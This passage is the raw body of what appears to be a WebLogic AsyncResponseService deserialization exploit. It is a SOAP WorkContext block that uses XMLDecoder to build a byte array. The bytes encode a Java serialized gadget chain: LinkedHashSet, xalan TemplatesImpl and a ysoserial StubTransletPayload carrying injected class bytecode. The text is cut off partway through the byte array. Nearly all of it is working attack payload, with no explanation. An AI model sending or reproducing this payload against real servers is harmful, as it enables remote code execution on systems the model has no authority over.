xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void index=\"245\"><byte>101</byte></void><void index=\"246\"><byte>101</byte></void><void index=\"247\"><byte>116</byte></void><void index=\"248\"><byte>116</byte></void><void index=\"249\"><byte>0</byte></void><void index=\"250\"><byte>18</byte></void><void index=\"251\"><byte>76</byte></void><void index=\"252\"><byte>106</byte></void><void index=\"253\"><byte>97</byte></void><void index=\"254\"><byte>118</byte></void><void index=\"255\"><byte>97</byte></void><void index=\"256\"><byte>47</byte></void><void index=\"257\"><byte>108</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>110</byte></void><void index=\"260\"><byte>103</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>83</byte></void><void index=\"263\"><byte>116</byte></void><void index=\"264\"><byte>114</byte></void><void index=\"265\"><byte>105</byte></void><void index=\"266\"><byte>110</byte></void><void index=\"267\"><byte>103</byte></void><void index=\"268\"><byte>59</byte></void><void index=\"269\"><byte>76</byte></void><void index=\"270\"><byte>0</byte></void><void index=\"271\"><byte>11</byte></void><void index=\"272\"><byte>95</byte></void><void index=\"273\"><byte>97</byte></void><void index=\"274\"><byte>117</byte></void><void index=\"275\"><byte>120</byte></void><void index=\"276\"><byte>67</byte></void><void index=\"277\"><byte>108</byte></void><void index=\"278\"><byte>97</byte></void><void index=\"279\"><byte>115</byte></void><void index=\"280\"><byte>115</byte></void><void index=\"281\"><byte>101</byte></void><void index=\"282\"><byte>115</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>0</byte></void><void index=\"285\"><byte>59</byte></void><void index=\"286\"><byte>76</byte></void><void index=\"287\"><byte>99</byte></void><void index=\"288\"><byte>111</byte></void><void index=\"289\"><byte>109</byte></void><void index=\"290\"><byte>47</byte></void><void index=\"291\"><byte>115</byte></void><void index=\"292\"><byte>117</byte></void><void index=\"293\"><byte>110</byte></void><void index=\"294\"><byte>47</byte></void><void index=\"295\"><byte>111</byte></void><void index=\"296\"><byte>114</byte></void><void index=\"297\"><byte>103</byte></void><void index=\"298\"><byte>47</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>112</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>99</byte></void><void index=\"303\"><byte>104</byte></void><void index=\"304\"><byte>101</byte></void><void index=\"305\"><byte>47</byte></void><void index=\"306\"><byte>120</byte></void><void index=\"307\"><byte>97</byte></void><void index=\"308\"><byte>108</byte></void><void index=\"309\"><byte>97</byte></void><void index=\"310\"><byte>110</byte></void><void index=\"311\"><byte>47</byte></void><void index=\"312\"><byte>105</byte></void><void index=\"313\"><byte>110</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>101</byte></void><void index=\"316\"><byte>114</byte></void><void index=\"317\"><byte>110</byte></void><void index=\"318\"><byte>97</byte></void><void index=\"319\"><byte>108</byte></void><void index=\"320\"><byte>47</byte></void><void index=\"321\"><byte>120</byte></void><void index=\"322\"><byte>115</byte></void><void index=\"323\"><byte>108</byte></void><void index=\"324\"><byte>116</byte></void><void index=\"325\"><byte>99</byte></void><void index=\"326\"><byte>47</byte></void><void index=\"327\"><byte>114</byte></void><void index=\"328\"><byte>117</byte></void><void index=\"329\"><byte>110</byte></void><void index=\"330\"><byte>116</byte></void><void index=\"331\"><byte>105</byte></void><void index=\"332\"><byte>109</byte></void><void index=\"333\"><byte>101</byte></void><void index=\"334\"><byte>47</byte></void><void index=\"335\"><byte>72</byte></void><void index=\"336\"><byte>97</byte></void><void index=\"337\"><byte>115</byte></void><void index=\"338\"><byte>104</byte></void><void index=\"339\"><byte>116</byte></void><void index=\"340\"><byte>97</byte></void><void index=\"341\"><byte>98</byte></void><void index=\"342\"><byte>108</byte></void><void index=\"343\"><byte>101</byte></void><void index=\"344\"><byte>59</byte></void><void index=\"345\"><byte>91</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>10</byte></void><void index=\"348\"><byte>95</byte></void><void index=\"349\"><byte>98</byte></void><void index=\"350\"><byte>121</byte></void><void index=\"351\"><byte>116</byte></void><void index=\"352\"><byte>101</byte></void><void index=\"353\"><byte>99</byte></void><void index=\"354\"><byte>111</byte></void><void index=\"355\"><byte>100</byte></void><void index=\"356\"><byte>101</byte></void><void index=\"357\"><byte>115</byte></void><void index=\"358\"><byte>116</byte></void><void index=\"359\"><byte>0</byte></void><void index=\"360\"><byte>3</byte></void><void index=\"361\"><byte>91</byte></void><void index=\"362\"><byte>91</byte></void><void index=\"363\"><byte>66</byte></void><void index=\"364\"><byte>91</byte></void><void index=\"365\"><byte>0</byte></void><void index=\"366\"><byte>6</byte></void><void index=\"367\"><byte>95</byte></void><void index=\"368\"><byte>99</byte></void><void index=\"369\"><byte>108</byte></void><void index=\"370\"><byte>97</byte></void><void index=\"371\"><byte>115</byte></void><void index=\"372\"><byte>115</byte></void><void index=\"373\"><byte>116</byte></void><void index=\"374\"><byte>0</byte></void><void index=\"375\"><byte>18</byte></void><void index=\"376\"><byte>91</byte></void><void index=\"377\"><byte>76</byte></void><void index=\"378\"><byte>106</byte></void><void index=\"379\"><byte>97</byte></void><void index=\"380\"><byte>118</byte></void><void index=\"381\"><byte>97</byte></void><void index=\"382\"><byte>47</byte></void><void index=\"383\"><byte>108</byte></void><void index=\"384\"><byte>97</byte></void><void index=\"385\"><byte>110</byte></void><void index=\"386\"><byte>103</byte></void><void index=\"387\"><byte>47</byte></void><void index=\"388\"><byte>67</byte></void><void index=\"389\"><byte>108</byte></void><void index=\"390\"><byte>97</byte></void><void index=\"391\"><byte>115</byte></void><void index=\"392\"><byte>115</byte></void><void index=\"393\"><byte>59</byte></void><void index=\"394\"><byte>76</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>5</byte></void><void index=\"397\"><byte>95</byte></void><void index=\"398\"><byte>110</byte></void><void index=\"399\"><byte>97</byte></void><void index=\"400\"><byte>109</byte></void><void index=\"401\"><byte>101</byte></void><void index=\"402\"><byte>113</byte></void><void index=\"403\"><byte>0</byte></void><void index=\"404\"><byte>126</byte></void><void index=\"405\"><byte>0</byte></void><void index=\"406\"><byte>4</byte></void><void index=\"407\"><byte>76</byte></void><void index=\"408\"><byte>0</byte></void><void index=\"409\"><byte>17</byte></void><void index=\"410\"><byte>95</byte></void><void index=\"411\"><byte>111</byte></void><void index=\"412\"><byte>117</byte></void><void index=\"413\"><byte>116</byte></void><void index=\"414\"><byte>112</byte></void><void index=\"415\"><byte>117</byte></void><void index=\"416\"><byte>116</byte></void><void index=\"417\"><byte>80</byte></void><void index=\"418\"><byte>114</byte></void><void index=\"419\"><byte>111</byte></void><void index=\"420\"><byte>112</byte></void><void index=\"421\"><byte>101</byte></void><void index=\"422\"><byte>114</byte></void><void index=\"423\"><byte>116</byte></void><void index=\"424\"><byte>105</byte></void><void index=\"425\"><byte>101</byte></void><void index=\"426\"><byte>115</byte></void><void index=\"427\"><byte>116</byte></void><void index=\"428\"><byte>0</byte></void><void index=\"429\"><byte>22</byte></void><void index=\"430\"><byte>76</byte></void><void index=\"431\"><byte>106</byte></void><void index=\"432\"><byte>97</byte></void><void index=\"433\"><byte>118</byte></void><void index=\"434\"><byte>97</byte></void><void index=\"435\"><byte>47</byte></void><void index=\"436\"><byte>117</byte></void><void index=\"437\"><byte>116</byte></void><void index=\"438\"><byte>105</byte></void><void index=\"439\"><byte>108</byte></void><void index=\"440\"><byte>47</byte></void><void index=\"441\"><byte>80</byte></void><void index=\"442\"><byte>114</byte></void><void index=\"443\"><byte>111</byte></void><void index=\"444\"><byte>112</byte></void><void index=\"445\"><byte>101</byte></void><void index=\"446\"><byte>114</byte></void><void index=\"447\"><byte>116</byte></void><void index=\"448\"><byte>105</byte></void><void index=\"449\"><byte>101</byte></void><void index=\"450\"><byte>115</byte></void><void index=\"451\"><byte>59</byte></void><void index=\"452\"><byte>120</byte></void><void index=\"453\"><byte>112</byte></void><void index=\"454\"><byte>0</byte></void><void index=\"455\"><byte>0</byte></void><void index=\"456\"><byte>0</byte></void><void index=\"457\"><byte>0</byte></void><void index=\"458\"><byte>-1</byte></void><void index=\"459\"><byte>-1</byte></void><void index=\"460\"><byte>-1</byte></void><void index=\"461\"><byte>-1</byte></void><void index=\"462\"><byte>0</byte></void><void index=\"463\"><byte>116</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>3</byte></void><void index=\"466\"><byte>97</byte></void><void index=\"467\"><byte>108</byte></void><void index=\"468\"><byte>108</byte></void><void index=\"469\"><byte>112</byte></void><void index=\"470\"><byte>117</byte></void><void index=\"471\"><byte>114</byte></void><void index=\"472\"><byte>0</byte></void><void index=\"473\"><byte>3</byte></void><void index=\"474\"><byte>91</byte></void><void index=\"475\"><byte>91</byte></void><void index=\"476\"><byte>66</byte></void><void index=\"477\"><byte>75</byte></void><void index=\"478\"><byte>-3</byte></void><void index=\"479\"><byte>25</byte></void><void index=\"480\"><byte>21</byte></void><void index=\"481\"><byte>103</byte></void><void index=\"482\"><byte>103</byte></void><void index=\"483\"><byte>-37</byte></void><void index=\"484\"><byte>55</byte></void><void index=\"485\"><byte>2</byte></void><void index=\"486\"><byte>0</byte></void><void index=\"487\"><byte>0</byte></void><void index=\"488\"><byte>120</byte></void><void index=\"489\"><byte>112</byte></void><void index=\"490\"><byte>0</byte></void><void index=\"491\"><byte>0</byte></void><void index=\"492\"><byte>0</byte></void><void index=\"493\"><byte>2</byte></void><void index=\"494\"><byte>117</byte></void><void index=\"495\"><byte>114</byte></void><void index=\"496\"><byte>0</byte></void><void index=\"497\"><byte>2</byte></void><void index=\"498\"><byte>91</byte></void><void index=\"499\"><byte>66</byte></void><void index=\"500\"><byte>-84</byte></void><void index=\"501\"><byte>-13</byte></void><void index=\"502\"><byte>23</byte></void><void index=\"503\"><byte>-8</byte></void><void index=\"504\"><byte>6</byte></void><void index=\"505\"><byte>8</byte></void><void index=\"506\"><byte>84</byte></void><void index=\"507\"><byte>-32</byte></void><void index=\"508\"><byte>2</byte></void><void index=\"509\"><byte>0</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>120</byte></void><void index=\"512\"><byte>112</byte></void><void index=\"513\"><byte>0</byte></void><void index=\"514\"><byte>0</byte></void><void index=\"515\"><byte>14</byte></void><void index=\"516\"><byte>29</byte></void><void index=\"517\"><byte>-54</byte></void><void index=\"518\"><byte>-2</byte></void><void index=\"519\"><byte>-70</byte></void><void index=\"520\"><byte>-66</byte></void><void index=\"521\"><byte>0</byte></void><void index=\"522\"><byte>0</byte></void><void index=\"523\"><byte>0</byte></void><void index=\"524\"><byte>50</byte></void><void index=\"525\"><byte>0</byte></void><void index=\"526\"><byte>-70</byte></void><void index=\"527\"><byte>10</byte></void><void index=\"528\"><byte>0</byte></void><void index=\"529\"><byte>3</byte></void><void index=\"530\"><byte>0</byte></void><void index=\"531\"><byte>34</byte></void><void index=\"532\"><byte>7</byte></void><void index=\"533\"><byte>0</byte></void><void index=\"534\"><byte>-72</byte></void><void index=\"535\"><byte>7</byte></void><void index=\"536\"><byte>0</byte></void><void index=\"537\"><byte>37</byte></void><void index=\"538\"><byte>7</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>38</byte></void><void index=\"541\"><byte>1</byte></void><void index=\"542\"><byte>0</byte></void><void index=\"543\"><byte>16</byte></void><void index=\"544\"><byte>115</byte></void><void index=\"545\"><byte>101</byte></void><void index=\"546\"><byte>114</byte></void><void index=\"547\"><byte>105</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>108</byte></void><void index=\"550\"><byte>86</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>114</byte></void><void index=\"553\"><byte>115</byte></void><void index=\"554\"><byte>105</byte></void><void index=\"555\"><byte>111</byte></void><void index=\"556\"><byte>110</byte></void><void index=\"557\"><byte>85</byte></void><void index=\"558\"><byte>73</byte></void><void index=\"559\"><byte>68</byte></void><void index=\"560\"><byte>1</byte></void><void index=\"561\"><byte>0</byte></void><void index=\"562\"><byte>1</byte></void><void index=\"563\"><byte>74</byte></void><void index=\"564\"><byte>1</byte></void><void index=\"565\"><byte>0</byte></void><void index=\"566\"><byte>13</byte></void><void index=\"567\"><byte>67</byte></void><void index=\"568\"><byte>111</byte></void><void index=\"569\"><byte>110</byte></void><void index=\"570\"><byte>115</byte></void><void index=\"571\"><byte>116</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>110</byte></void><void index=\"574\"><byte>116</byte></void><void index=\"575\"><byte>86</byte></void><void index=\"576\"><byte>97</byte></void><void index=\"577\"><byte>108</byte></void><void index=\"578\"><byte>117</byte></void><void index=\"579\"><byte>101</byte></void><void index=\"580\"><byte>5</byte></void><void index=\"581\"><byte>-83</byte></void><void index=\"582\"><byte>32</byte></void><void index=\"583\"><byte>-109</byte></void><void index=\"584\"><byte>-13</byte></void><void index=\"585\"><byte>-111</byte></void><void index=\"586\"><byte>-35</byte></void><void index=\"587\"><byte>-17</byte></void><void index=\"588\"><byte>62</byte></void><void index=\"589\"><byte>1</byte></void><void index=\"590\"><byte>0</byte></void><void index=\"591\"><byte>6</byte></void><void index=\"592\"><byte>60</byte></void><void index=\"593\"><byte>105</byte></void><void index=\"594\"><byte>110</byte></void><void index=\"595\"><byte>105</byte></void><void index=\"596\"><byte>116</byte></void><void index=\"597\"><byte>62</byte></void><void index=\"598\"><byte>1</byte></void><void index=\"599\"><byte>0</byte></void><void index=\"600\"><byte>3</byte></void><void index=\"601\"><byte>40</byte></void><void index=\"602\"><byte>41</byte></void><void index=\"603\"><byte>86</byte></void><void index=\"604\"><byte>1</byte></void><void index=\"605\"><byte>0</byte></void><void index=\"606\"><byte>4</byte></void><void index=\"607\"><byte>67</byte></void><void index=\"608\"><byte>111</byte></void><void index=\"609\"><byte>100</byte></void><void index=\"610\"><byte>101</byte></void><void index=\"611\"><byte>1</byte></void><void index=\"612\"><byte>0</byte></void><void index=\"613\"><byte>15</byte></void><void index=\"614\"><byte>76</byte></void><void index=\"615\"><byte>105</byte></void><void index=\"616\"><byte>110</byte></void><void index=\"617\"><byte>101</byte></void><void index=\"618\"><byte>78</byte></void><void index=\"619\"><byte>117</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>98</byte></void><void index=\"622\"><byte>101</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>84</byte></void><void index=\"625\"><byte>97</byte></void><void index=\"626\"><byte>98</byte></void><void index=\"627\"><byte>108</byte></void><void index=\"628\"><byte>101</byte></void><void index=\"629\"><byte>1</byte></void><void index=\"630\"><byte>0</byte></void><void index=\"631\"><byte>18</byte></void><void index=\"632\"><byte>76</byte></void><void index=\"633\"><byte>111</byte></void><void index=\"634\"><byte>99</byte></void><void index=\"635\"><byte>97</byte></void><void index=\"636\"><byte>108</byte></void><void index=\"637\"><byte>86</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>114</byte></void><void index=\"640\"><byte>105</byte></void><void index=\"641\"><byte>97</byte></void><void index=\"642\"><byte>98</byte></void><void index=\"643\"><byte>108</byte></void><void index=\"644\"><byte>101</byte></void><void index=\"645\"><byte>84</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>98</byte></void><void index=\"648\"><byte>108</byte></void><void index=\"649\"><byte>101</byte></void><void index=\"650\"><byte>1</byte></void><void index=\"651\"><byte>0</byte></void><void index=\"652\"><byte>4</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>104</byte></void><void index=\"655\"><byte>105</byte></void><void index=\"656\"><byte>115</byte></void><void index=\"657\"><byte>1</byte></void><void index=\"658\"><byte>0</byte></void><void index=\"659\"><byte>19</byte></void><void index=\"660\"><byte>83</byte></void><void index=\"661\"><byte>116</byte></void><void index=\"662\"><byte>117</byte></void><void index=\"663\"><byte>98</byte></void><void index=\"664\"><byte>84</byte></void><void index=\"665\"><byte>114</byte></void><void index=\"666\"><byte>97</byte></void><void index=\"667\"><byte>110</byte></void><void index=\"668\"><byte>115</byte></void><void index=\"669\"><byte>108</byte></void><void index=\"670\"><byte>101</byte></void><void index=\"671\"><byte>116</byte></void><void index=\"672\"><byte>80</byte></void><void index=\"673\"><byte>97</byte></void><void index=\"674\"><byte>121</byte></void><void index=\"675\"><byte>108</byte></void><void index=\"676\"><byte>111</byte></void><void index=\"677\"><byte>97</byte></void><void index=\"678\"><byte>100</byte></void><void index=\"679\"><byte>1</byte></void><void index=\"680\"><byte>0</byte></void><void index=\"681\"><byte>12</byte></void><void index=\"682\"><byte>73</byte></void><void index=\"683\"><byte>110</byte></void><void index=\"684\"><byte>110</byte></void><void index=\"685\"><byte>101</byte></void><void index=\"686\"><byte>114</byte></void><void index=\"687\"><byte>67</byte></void><void index=\"688\"><byte>108</byte></void><void index=\"689\"><byte>97</byte></void><void index=\"690\"><byte>115</byte></void><void index=\"691\"><byte>115</byte></void><void index=\"692\"><byte>101</byte></void><void index=\"693\"><byte>115</byte></void><void index=\"694\"><byte>1</byte></void><void index=\"695\"><byte>0</byte></void><void index=\"696\"><byte>53</byte></void><void index=\"697\"><byte>76</byte></void><void index=\"698\"><byte>121</byte></void><void index=\"699\"><byte>115</byte></void><void index=\"700\"><byte>111</byte></void><void index=\"701\"><byte>115</byte></void><void index=\"702\"><byte>101</byte></void><void index=\"703\"><byte>114</byte></void><void index=\"704\"><byte>105</byte></void><void index=\"705\"><byte>97</byte></void><void index=\"706\"><byte>108</byte></void><void index=\"707\"><byte>47</byte></void><void index=\"708\"><byte>112</byte></void><void index=\"709\"><byte>97</byte></void><void index=\"710\"><byte>121</byte></void><void index=\"711\"><byte>108</byte></void><void index=\"712\"><byte>111</byte></void><void index=\"713\"><byte>97</byte></void><void index=\"714\"><byte>100</byte></void><void index=\"715\"><byte>115</byte></void><void index=\"716\"><byte>47</byte></void><void index=\"717\"><byte>117</byte></void><void index=\"718\"><byte>116</byte></void><void index=\"719\"><byte>105</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>47</byte></void><void index=\"722\"><byte>71</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>100</byte></void><void index=\"725\"><byte>103</byte></void><void index=\"726\"><byte>101</byte></void><void index=\"727\"><byte>116</byte></void><void index=\"728\"><byte>115</byte></void><void index=\"729\"><byte>36</byte></void><void index=\"730\"><byte>83</byte></void><void index=\"731\"><byte>116</byte></void><void index=\"732\"><byte>117</byte></void><void index=\"733\"><byte>98</byte></void><void index=\"734\"><byte>84</byte></void><void index=\"735\"><byte>114</byte></void><void index=\"736\"><byte>97</byte></void><void index=\"737\"><byte>110</byte></void><void index=\"738\"><byte>115</byte></void><void index=\"739\"><byte>108</byte></void><void index=\"740\"><byte>101</byte></void><void index=\"741\"><byte>116</byte></void><void index=\"742\"><byte>80</byte></void><void index=\"743\"><byte>97</byte></void><void index=\"744\"><byte>121</byte></void><void index=\"745\"><byte>108</byte></void><void index=\"746\"><byte>111</byte></void><void index=\"747\"><byte>97</byte></void><void index=\"748\"><byte>100</byte></void><void index=\"749\"><byte>59</byte></void><void index=\"750\"><byte>1</byte></void><void index=\"751\"><byte>0</byte></void><void index=\"752\"><byte>9</byte></void><void index=\"753\"><byte>116</byte></void><void index=\"754\"><byte>114</byte></void><void index=\"755\"><byte>97</byte></void><void index=\"756\"><byte>110</byte></void><void index=\"757\"><byte>115</byte></void><void index=\"758\"><byte>102</byte></void><void index=\"759\"><byte>111</byte></void><void index=\"760\"><byte>114</byte></void><void index=\"761\"><byte>109</byte></void><void index=\"762\"><byte>1</byte></void><void index=\"763\"><byte>0</byte></void><void index=\"764\"><byte>114</byte></void><void index=\"765\"><byte>40</byte></void><void index=\"766\"><byte>76</byte></void><void index=\"767\"><byte>99</byte></void><void index=\"768\"><byte>111</byte></void><void index=\"769\"><byte>109</byte></void><void index=\"770\"><byte>47</byte></void><void index=\"771\"><byte>115</byte></void><void index=\"772\"><byte>117</byte></void><void index=\"773\"><byte>110</byte></void><void index=\"774\"><byte>47</byte></void><void index=\"775\"><byte>111</byte></void><void index=\"776\"><byte>114</byte></void><void index=\"777\"><byte>103</byte></void><void 